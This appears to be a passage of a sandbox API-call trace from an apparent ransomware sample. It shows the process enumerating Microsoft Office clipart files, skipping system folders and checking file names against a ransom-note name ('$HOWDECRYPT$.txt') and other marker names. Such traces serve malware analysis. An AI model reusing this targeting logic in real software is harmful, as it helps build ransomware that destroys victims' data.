(lpString1="HH01013_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.856] lstrcmpW (lpString1="HH01013_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.856] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 67 [0097.856] GetProcessHeap () returned 0x2c0000 [0097.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13240 [0097.856] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f20) returned 0x3867e8 [0097.856] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.856] lstrcmpiW (lpString1="HH01015_.WMF", lpString2="Windows") returned -1 [0097.856] lstrlenW (lpString="Windows") returned 7 [0097.856] lstrcmpiW (lpString1="HH01015_.WMF", lpString2="$Recycle.bin") returned 1 [0097.856] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.856] lstrcmpiW (lpString1="HH01015_.WMF", lpString2="System Volume Information") returned -1 [0097.856] lstrlenW (lpString="System Volume Information") returned 25 [0097.856] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 67 [0097.856] StrStrIW (lpFirst="HH01015_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.856] lstrcmpW (lpString1="HH01015_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.856] lstrcmpW (lpString1="HH01015_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.856] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 67 [0097.856] GetProcessHeap () returned 0x2c0000 [0097.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13310 [0097.856] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f28) returned 0x3867e8 [0097.857] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.857] lstrcmpiW (lpString1="HH01058_.WMF", lpString2="Windows") returned -1 [0097.857] lstrlenW (lpString="Windows") returned 7 [0097.857] lstrcmpiW (lpString1="HH01058_.WMF", lpString2="$Recycle.bin") returned 1 [0097.857] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.857] lstrcmpiW (lpString1="HH01058_.WMF", lpString2="System Volume Information") returned -1 [0097.857] lstrlenW (lpString="System Volume Information") returned 25 [0097.857] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 67 [0097.857] StrStrIW (lpFirst="HH01058_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.857] lstrcmpW (lpString1="HH01058_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.857] lstrcmpW (lpString1="HH01058_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.857] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 67 [0097.857] GetProcessHeap () returned 0x2c0000 [0097.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c133e0 [0097.857] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f30) returned 0x3867e8 [0097.857] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.857] lstrcmpiW (lpString1="HH01065_.WMF", lpString2="Windows") returned -1 [0097.857] lstrlenW (lpString="Windows") returned 7 [0097.857] lstrcmpiW (lpString1="HH01065_.WMF", lpString2="$Recycle.bin") returned 1 [0097.857] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.857] lstrcmpiW (lpString1="HH01065_.WMF", lpString2="System Volume Information") returned -1 [0097.857] lstrlenW (lpString="System Volume Information") returned 25 [0097.858] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 67 [0097.858] StrStrIW (lpFirst="HH01065_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.858] lstrcmpW (lpString1="HH01065_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.858] lstrcmpW (lpString1="HH01065_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.858] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 67 [0097.858] GetProcessHeap () returned 0x2c0000 [0097.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c134b0 [0097.858] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f38) returned 0x3867e8 [0097.858] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.858] lstrcmpiW (lpString1="HH01080_.WMF", lpString2="Windows") returned -1 [0097.858] lstrlenW (lpString="Windows") returned 7 [0097.858] lstrcmpiW (lpString1="HH01080_.WMF", lpString2="$Recycle.bin") returned 1 [0097.858] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.858] lstrcmpiW (lpString1="HH01080_.WMF", lpString2="System Volume Information") returned -1 [0097.858] lstrlenW (lpString="System Volume Information") returned 25 [0097.858] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 67 [0097.858] StrStrIW (lpFirst="HH01080_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.858] lstrcmpW (lpString1="HH01080_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.858] lstrcmpW (lpString1="HH01080_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.858] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 67 [0097.858] GetProcessHeap () returned 0x2c0000 [0097.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13580 [0097.859] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f40) returned 0x3867e8 [0097.859] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.859] lstrcmpiW (lpString1="HH01242_.WMF", lpString2="Windows") returned -1 [0097.859] lstrlenW (lpString="Windows") returned 7 [0097.859] lstrcmpiW (lpString1="HH01242_.WMF", lpString2="$Recycle.bin") returned 1 [0097.859] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.859] lstrcmpiW (lpString1="HH01242_.WMF", lpString2="System Volume Information") returned -1 [0097.859] lstrlenW (lpString="System Volume Information") returned 25 [0097.859] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 67 [0097.859] StrStrIW (lpFirst="HH01242_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.859] lstrcmpW (lpString1="HH01242_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.859] lstrcmpW (lpString1="HH01242_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.859] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 67 [0097.859] GetProcessHeap () returned 0x2c0000 [0097.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13650 [0097.859] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f48) returned 0x3867e8 [0097.859] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.859] lstrcmpiW (lpString1="HH01291_.WMF", lpString2="Windows") returned -1 [0097.859] lstrlenW (lpString="Windows") returned 7 [0097.859] lstrcmpiW (lpString1="HH01291_.WMF", lpString2="$Recycle.bin") returned 1 [0097.859] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.859] lstrcmpiW (lpString1="HH01291_.WMF", lpString2="System Volume Information") returned -1 [0097.860] lstrlenW (lpString="System Volume Information") returned 25 [0097.860] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 67 [0097.860] StrStrIW (lpFirst="HH01291_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.860] lstrcmpW (lpString1="HH01291_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.860] lstrcmpW (lpString1="HH01291_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.860] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 67 [0097.860] GetProcessHeap () returned 0x2c0000 [0097.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13720 [0097.860] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f50) returned 0x3867e8 [0097.860] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.860] lstrcmpiW (lpString1="HH01329_.WMF", lpString2="Windows") returned -1 [0097.860] lstrlenW (lpString="Windows") returned 7 [0097.860] lstrcmpiW (lpString1="HH01329_.WMF", lpString2="$Recycle.bin") returned 1 [0097.860] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.860] lstrcmpiW (lpString1="HH01329_.WMF", lpString2="System Volume Information") returned -1 [0097.860] lstrlenW (lpString="System Volume Information") returned 25 [0097.860] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 67 [0097.860] StrStrIW (lpFirst="HH01329_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.860] lstrcmpW (lpString1="HH01329_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.860] lstrcmpW (lpString1="HH01329_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.860] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 67 [0097.860] GetProcessHeap () returned 0x2c0000 [0097.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c137f0 [0097.861] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f58) returned 0x3867e8 [0097.861] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.861] lstrcmpiW (lpString1="HH01461_.WMF", lpString2="Windows") returned -1 [0097.861] lstrlenW (lpString="Windows") returned 7 [0097.861] lstrcmpiW (lpString1="HH01461_.WMF", lpString2="$Recycle.bin") returned 1 [0097.861] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.861] lstrcmpiW (lpString1="HH01461_.WMF", lpString2="System Volume Information") returned -1 [0097.861] lstrlenW (lpString="System Volume Information") returned 25 [0097.861] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 67 [0097.861] StrStrIW (lpFirst="HH01461_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.861] lstrcmpW (lpString1="HH01461_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.861] lstrcmpW (lpString1="HH01461_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.861] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 67 [0097.861] GetProcessHeap () returned 0x2c0000 [0097.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c138c0 [0097.865] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f60) returned 0x3867e8 [0097.865] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.865] lstrcmpiW (lpString1="HH01618_.WMF", lpString2="Windows") returned -1 [0097.865] lstrlenW (lpString="Windows") returned 7 [0097.865] lstrcmpiW (lpString1="HH01618_.WMF", lpString2="$Recycle.bin") returned 1 [0097.865] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.865] lstrcmpiW (lpString1="HH01618_.WMF", lpString2="System Volume Information") returned -1 [0097.865] lstrlenW (lpString="System Volume Information") returned 25 [0097.865] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 67 [0097.865] StrStrIW (lpFirst="HH01618_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.865] lstrcmpW (lpString1="HH01618_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.865] lstrcmpW (lpString1="HH01618_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.865] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 67 [0097.865] GetProcessHeap () returned 0x2c0000 [0097.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13990 [0097.865] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f68) returned 0x3867e8 [0097.865] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.865] lstrcmpiW (lpString1="HH01759_.WMF", lpString2="Windows") returned -1 [0097.865] lstrlenW (lpString="Windows") returned 7 [0097.865] lstrcmpiW (lpString1="HH01759_.WMF", lpString2="$Recycle.bin") returned 1 [0097.866] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.866] lstrcmpiW (lpString1="HH01759_.WMF", lpString2="System Volume Information") returned -1 [0097.866] lstrlenW (lpString="System Volume Information") returned 25 [0097.866] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 67 [0097.866] StrStrIW (lpFirst="HH01759_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.866] lstrcmpW (lpString1="HH01759_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.866] lstrcmpW (lpString1="HH01759_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.866] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 67 [0097.866] GetProcessHeap () returned 0x2c0000 [0097.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13a60 [0097.866] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f70) returned 0x3867e8 [0097.866] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.866] lstrcmpiW (lpString1="HH01875_.WMF", lpString2="Windows") returned -1 [0097.866] lstrlenW (lpString="Windows") returned 7 [0097.866] lstrcmpiW (lpString1="HH01875_.WMF", lpString2="$Recycle.bin") returned 1 [0097.866] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.866] lstrcmpiW (lpString1="HH01875_.WMF", lpString2="System Volume Information") returned -1 [0097.866] lstrlenW (lpString="System Volume Information") returned 25 [0097.866] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 67 [0097.866] StrStrIW (lpFirst="HH01875_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.866] lstrcmpW (lpString1="HH01875_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.866] lstrcmpW (lpString1="HH01875_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.867] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 67 [0097.867] GetProcessHeap () returned 0x2c0000 [0097.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13b30 [0097.867] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f78) returned 0x3867e8 [0097.867] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.867] lstrcmpiW (lpString1="HH01923_.WMF", lpString2="Windows") returned -1 [0097.867] lstrlenW (lpString="Windows") returned 7 [0097.867] lstrcmpiW (lpString1="HH01923_.WMF", lpString2="$Recycle.bin") returned 1 [0097.867] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.867] lstrcmpiW (lpString1="HH01923_.WMF", lpString2="System Volume Information") returned -1 [0097.867] lstrlenW (lpString="System Volume Information") returned 25 [0097.867] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 67 [0097.867] StrStrIW (lpFirst="HH01923_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.867] lstrcmpW (lpString1="HH01923_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.867] lstrcmpW (lpString1="HH01923_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.867] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 67 [0097.867] GetProcessHeap () returned 0x2c0000 [0097.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13c00 [0097.867] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f80) returned 0x3867e8 [0097.867] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.867] lstrcmpiW (lpString1="HH02155_.WMF", lpString2="Windows") returned -1 [0097.867] lstrlenW (lpString="Windows") returned 7 [0097.868] lstrcmpiW (lpString1="HH02155_.WMF", lpString2="$Recycle.bin") returned 1 [0097.868] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.868] lstrcmpiW (lpString1="HH02155_.WMF", lpString2="System Volume Information") returned -1 [0097.868] lstrlenW (lpString="System Volume Information") returned 25 [0097.868] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 67 [0097.868] StrStrIW (lpFirst="HH02155_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.868] lstrcmpW (lpString1="HH02155_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.868] lstrcmpW (lpString1="HH02155_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.868] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 67 [0097.868] GetProcessHeap () returned 0x2c0000 [0097.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13cd0 [0097.868] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f88) returned 0x3867e8 [0097.868] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.868] lstrcmpiW (lpString1="HH02166_.WMF", lpString2="Windows") returned -1 [0097.868] lstrlenW (lpString="Windows") returned 7 [0097.868] lstrcmpiW (lpString1="HH02166_.WMF", lpString2="$Recycle.bin") returned 1 [0097.868] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.868] lstrcmpiW (lpString1="HH02166_.WMF", lpString2="System Volume Information") returned -1 [0097.868] lstrlenW (lpString="System Volume Information") returned 25 [0097.868] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 67 [0097.868] StrStrIW (lpFirst="HH02166_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.868] lstrcmpW (lpString1="HH02166_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.869] lstrcmpW (lpString1="HH02166_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.869] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 67 [0097.869] GetProcessHeap () returned 0x2c0000 [0097.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13da0 [0097.869] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f90) returned 0x3867e8 [0097.869] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.869] lstrcmpiW (lpString1="HH02282_.WMF", lpString2="Windows") returned -1 [0097.869] lstrlenW (lpString="Windows") returned 7 [0097.869] lstrcmpiW (lpString1="HH02282_.WMF", lpString2="$Recycle.bin") returned 1 [0097.869] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.869] lstrcmpiW (lpString1="HH02282_.WMF", lpString2="System Volume Information") returned -1 [0097.869] lstrlenW (lpString="System Volume Information") returned 25 [0097.869] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 67 [0097.869] StrStrIW (lpFirst="HH02282_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.869] lstrcmpW (lpString1="HH02282_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.869] lstrcmpW (lpString1="HH02282_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.869] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 67 [0097.869] GetProcessHeap () returned 0x2c0000 [0097.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13e70 [0097.869] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1f98) returned 0x3867e8 [0097.869] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.869] lstrcmpiW (lpString1="HH02298_.WMF", lpString2="Windows") returned -1 [0097.870] lstrlenW (lpString="Windows") returned 7 [0097.870] lstrcmpiW (lpString1="HH02298_.WMF", lpString2="$Recycle.bin") returned 1 [0097.870] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.870] lstrcmpiW (lpString1="HH02298_.WMF", lpString2="System Volume Information") returned -1 [0097.870] lstrlenW (lpString="System Volume Information") returned 25 [0097.870] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 67 [0097.870] StrStrIW (lpFirst="HH02298_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.870] lstrcmpW (lpString1="HH02298_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.870] lstrcmpW (lpString1="HH02298_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.870] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 67 [0097.870] GetProcessHeap () returned 0x2c0000 [0097.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c13f40 [0097.870] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1fa0) returned 0x3867e8 [0097.870] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.870] lstrcmpiW (lpString1="HH02312_.WMF", lpString2="Windows") returned -1 [0097.870] lstrlenW (lpString="Windows") returned 7 [0097.870] lstrcmpiW (lpString1="HH02312_.WMF", lpString2="$Recycle.bin") returned 1 [0097.870] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.870] lstrcmpiW (lpString1="HH02312_.WMF", lpString2="System Volume Information") returned -1 [0097.870] lstrlenW (lpString="System Volume Information") returned 25 [0097.870] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 67 [0097.870] StrStrIW (lpFirst="HH02312_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.871] lstrcmpW (lpString1="HH02312_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.871] lstrcmpW (lpString1="HH02312_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.871] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 67 [0097.871] GetProcessHeap () returned 0x2c0000 [0097.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3887a8 [0097.871] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x1fa8) returned 0x38a790 [0097.871] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.871] lstrcmpiW (lpString1="HH02313_.WMF", lpString2="Windows") returned -1 [0097.871] lstrlenW (lpString="Windows") returned 7 [0097.871] lstrcmpiW (lpString1="HH02313_.WMF", lpString2="$Recycle.bin") returned 1 [0097.871] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.871] lstrcmpiW (lpString1="HH02313_.WMF", lpString2="System Volume Information") returned -1 [0097.871] lstrlenW (lpString="System Volume Information") returned 25 [0097.871] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 67 [0097.871] StrStrIW (lpFirst="HH02313_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.871] lstrcmpW (lpString1="HH02313_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.871] lstrcmpW (lpString1="HH02313_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.871] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 67 [0097.871] GetProcessHeap () returned 0x2c0000 [0097.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x388878 [0097.871] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x1fb0) returned 0x38a790 [0097.872] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.872] lstrcmpiW (lpString1="HM00005_.WMF", lpString2="Windows") returned -1 [0097.872] lstrlenW (lpString="Windows") returned 7 [0097.872] lstrcmpiW (lpString1="HM00005_.WMF", lpString2="$Recycle.bin") returned 1 [0097.872] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.872] lstrcmpiW (lpString1="HM00005_.WMF", lpString2="System Volume Information") returned -1 [0097.872] lstrlenW (lpString="System Volume Information") returned 25 [0097.872] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 67 [0097.872] StrStrIW (lpFirst="HM00005_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.872] lstrcmpW (lpString1="HM00005_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.872] lstrcmpW (lpString1="HM00005_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.872] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 67 [0097.872] 